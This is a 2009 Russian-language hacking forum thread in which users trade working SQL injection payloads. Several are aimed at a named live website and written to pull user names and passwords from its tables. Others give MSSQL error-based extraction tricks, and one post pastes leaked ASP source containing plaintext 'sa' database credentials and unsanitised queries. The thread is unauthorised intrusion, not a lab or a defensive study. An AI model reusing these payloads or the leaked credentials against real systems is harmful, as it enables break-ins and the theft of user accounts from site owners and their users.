 |
|

14.11.2009, 20:02
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS.
Немного теории:
К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру.
Смотрятся текущие права довольно просто:
fs listacl dir_name
Устанавливаются еще проще:
fs setacl dir_name username user_rights
бла бла бла..
|
|
|

14.11.2009, 22:40
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
почему не выводит пароля и логина?
http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+tblUser--
|
|
|

14.11.2009, 22:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+
|
|
|

15.11.2009, 11:35
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 2
С нами:
8679501
Репутация:
0
|
|
Сообщение от ElteRUS
Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.
Я обычно использую такой запрос для поиска актуальных таблиц
1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*
Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.
Спасибо Большое! +10 тебе!
Есть еще кое что. Во время ковыряния на этом сайте, на одной из страниц как то вывалилась такая ошибочка, хорошо что сохранил:
<% err_mess1=0 msg=0 if request.form("Send").Count>0 then name=Trim(replace(Request.Form("name"), "'", "’")) mail=Trim(replace(Request.Form("mail"), "'", "’")) if len(name)=0 or len(mail)=0 then err_mess1=1 else 'connection_string="DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/gbdb.mdb") & ";" Set Conn1 = Server.CreateObject("ADODB.Connection") Conn1.Open "DRIVER=SQL Server;SERVER=SERVER;UID=sa;APP=Microsoft Open Database Connectivity;WSID=server;DATABASE=promtractor;Network=DBMSSOCN;User Id=sa;PASSWORD=kpangen;" if request.Form("r1")="1" then set rc_check=SErver.createObject("ADODB.RECORDSET") rc_check.open "select * from subscribe where mail='"+mail+"'", conn1 if rc_check.eof then rc_check.close conn1.execute("insert into subscribe (name, mail) values ('"+name+"', '"+mail+"')") msg=1 else rc_check.close msg=3 end if else conn1.execute ("delete from subscribe where mail='"+mail+"'") msg=2 end if conn1.close end if end if if err_mess1>0 or msg=0 then %><% else response.write "" end if %>
|
|
|

15.11.2009, 18:08
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
Случайно не MSSQL? Sa- привелигированный пользователь MSSQL.
|
|
|

15.11.2009, 21:24
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
есть sqli на mssql,
надо узнать rows определенного столбца, но count() не выводит результата. Инъекция через convert(int())
как выводит результатов, данные таблицы выводится но база большая хочу узнать общее количество строк.Еще обьединеие результатов через Concat()/concat_ws()/group_concat() ошибку выдает
Последний раз редактировалось YuNi|[c; 15.11.2009 в 21:28..
|
|
|

15.11.2009, 21:34
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
count() возвращает int, поэтому необходимо преобразовать к типу varchar. Однако mssql преобразует строку обратно в число, поэтому я обычно делаю substring():
Код:
SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM information_schema.TABLES);
В запросе выше как раз есть пример конкатенации строк, для этого используется "+", методом GET необходимо использовать %2B.
Про аналог GROUP_CONCAT в MSSQL: http://raz0r.name/obzory/select-for-xml-sql-injection/
|
|
|

15.11.2009, 21:59
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
тогда запрось типа:
Код:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+count('Email')+from+tbl_Members))--
будеть
Код:
http://localhost/script.asp?id=4'+and+1=convert(int,(SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM tbl_Members)));
правильно я понял?
|
|
|

15.11.2009, 22:36
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
|
|
|

15.11.2009, 22:43
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от [Raz0r]
Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
не погло ((
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'cast'.
а '^' обязательно ли
|
|
|
|
 |
|
|
Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
|
|
|
|